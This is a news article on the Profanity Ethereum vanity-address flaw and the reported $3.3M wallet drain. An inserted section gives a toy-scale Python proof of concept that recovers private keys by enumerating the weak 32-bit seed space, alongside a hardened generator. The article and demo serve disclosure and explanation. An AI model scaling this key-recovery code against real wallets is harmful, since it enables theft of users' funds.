Wallets created with Profanity, a vanity address generator for Ethereum (ETH), are being drained after a weakness in the way the tool derives private keys was disclosed. Decentralized exchange aggregator 1inch Network reported the vulnerability and warned anyone holding funds at a Profanity-generated address to move them. Despite the warning, an attacker has allegedly stolen crypto worth $3.3 million from such wallets, and 1inch, along with several industry experts, is now investigating the case.
On September 15, 2022, 1inch Network disclosed the weakness in a Medium blog post. According to the exchange aggregator, Profanity uses a random 32-bit value to seed its 256-bit private keys, so the keys behind its vanity addresses have only about four billion possible starting points and can be brute-forced, which could give attackers access to users' wallets.
ZachXBT Tweets about Profanity tool vulnerability
🚨 RUN, YOU FOOLS 🚨
⚠️ Spoiler: Your money is NOT SAFU if your wallet address was generated with the Profanity tool. Transfer all of your assets to a different wallet ASAP!
— 1inch Network (@1inch) September 15, 2022
After 1inch Network's warning, blockchain investigator ZachXBT Tweeted about the vulnerability and the funds stolen from Profanity-generated wallets: "Appears $3.3m worth of crypto has been exploited by 0x6ae from this vulnerability." The Tweet also named the attacker's address. 1inch's own warning, posted on September 15, read: "RUN, YOU FOOLS, Spoiler: Your money is NOT SAFU if your wallet address was generated with the Profanity tool. Transfer all of your assets to a different wallet ASAP!".
Appears $3.3m worth of crypto has been exploited by 0x6ae from this vulnerability.
Interestingly the Indexed Finance Exploiter was the first address drained by 0x6ae.
— ZachXBT (@zachxbt) September 17, 2022
Not every targeted wallet was lost, however. In a follow-up Tweet, ZachXBT noted that the attacker had not fully drained one of the wallets it interacted with, and that their reporting on the Profanity vulnerability had helped one account holder save 1.2m+ worth of crypto & NFTs in time.
1Inch explains the Profanity tool vulnerability
A 1inch contributor noticed the weakness in early 2022: Profanity used a random 32-bit value to seed its 256-bit private keys. The contributor suspected that such a small seed space could let attackers recover the private keys of Profanity users' wallets.
The investigation that eventually uncovered the $3.3M drain of crypto and NFTs started in June 2022, when a contributor received a message from @samczsun about suspicious activity in one of the 1inch deployer wallets, as well as in wallets belonging to Synthetix and others.
While investigating a potential scam, the 1inch contributors realized that the same brute-force machinery Profanity uses to find vanity addresses could be run in reverse to recover the original seed from among only four billion (2^32) possibilities, far more cheaply than a search over 256-bit keys. The attack takes the public key of a vanity address (recoverable from any transaction it has signed), expands it into the two million candidate public keys that Profanity derives from a single seed by decrementing the key step by step, and then checks which of the four billion seeds produces a starting public key in that set; once the seed is known, the private key follows.
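The following is an added, toy-scale illustration of the weak key generation described above and of the reversal the 1inch contributors describe; it is not Profanity's or 1inch's code. Assumptions: Python's random.Random (an MT19937) seeded with a small integer stands in for Profanity's std::mt19937_64 seeded with a 32-bit std::random_device value; secp256k1 arithmetic is written out in plain affine coordinates for readability rather than speed; and the search runs over a constructed seed space of 2^8 seeds and a range of 32 keys per seed instead of the four billion seeds and two million keys of the real tool, so that it finishes in seconds. The algorithm is the same at either scale, and the hardened generator beside it shows what removes the attack.

```python
"""Toy-scale reconstruction of the Profanity key-recovery attack (added example)."""
import random
import secrets

# secp256k1 domain parameters (the curve Ethereum uses)
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def point_add(p1, p2):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None                                  # p1 == -p2
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P       # point doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k, point):
    """Double-and-add; a public key is scalar_mult(private_key, G)."""
    result = None
    while k:
        if k & 1:
            result = point_add(result, point)
        point = point_add(point, point)
        k >>= 1
    return result


NEG_G = (G[0], (-G[1]) % P)   # subtracting G is adding -G


def weak_start_key(seed):
    """Profanity-style start key: 256 bits fully determined by a small seed.

    random.Random(seed) is an assumed stand-in for mt19937_64(rd()).
    """
    rng = random.Random(seed)
    return rng.getrandbits(256) % (N - 1) + 1


def weak_vanity_keys(seed, key_range):
    """The tool walks start, start+1, ... from one seed and tests each
    address, so the key it finally reports is start + i for some i."""
    start = weak_start_key(seed)
    return [(start + i) % N for i in range(key_range)]


def recover_private_key(target_pub, seed_bits, key_range):
    """Reverse the generator: find the private key behind target_pub.

    Step 1: target_pub is (start + i)*G for an unknown i < key_range, so
            expand it into the key_range candidates target_pub - j*G.
    Step 2: enumerate every possible seed (2**seed_bits here, 2**32 in the
            real tool), derive its start key and look up start*G in the set.
    Cost: 2**seed_bits scalar multiplications instead of 2**256 guesses.
    """
    candidates = {}
    point = target_pub
    for j in range(key_range):
        candidates[point] = j
        point = point_add(point, NEG_G)
    for seed in range(1 << seed_bits):
        start = weak_start_key(seed)
        offset = candidates.get(scalar_mult(start, G))
        if offset is not None:
            return (start + offset) % N
    return None


def strong_private_key():
    """Hardened generation: 256 bits straight from the OS CSPRNG, no seed to guess."""
    return secrets.randbelow(N - 1) + 1


if __name__ == "__main__":
    # Constructed demo: a victim generated a vanity key from a tiny seed space.
    victim_key = weak_vanity_keys(seed=173, key_range=32)[17]
    observed_pub = scalar_mult(victim_key, G)          # what the chain reveals
    recovered = recover_private_key(observed_pub, seed_bits=8, key_range=32)
    print("recovered == victim:", recovered == victim_key)
```

The point of the example is the cost asymmetry: the attacker pays one scalar multiplication per possible seed, not per possible key, and the candidate set built in step 1 can be reused across every Profanity wallet seen on-chain, which is why a single precomputation lets many wallets be drained.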
1inch concludes that, because Profanity is one of the most popular tools on the market thanks to its speed, the likely consequence is that "most of the Profanity wallets were hacked secretly." The company adds that the attacker's wallet address and the evidence of the thefts are available on-chain and can be used to trace whoever stole the funds.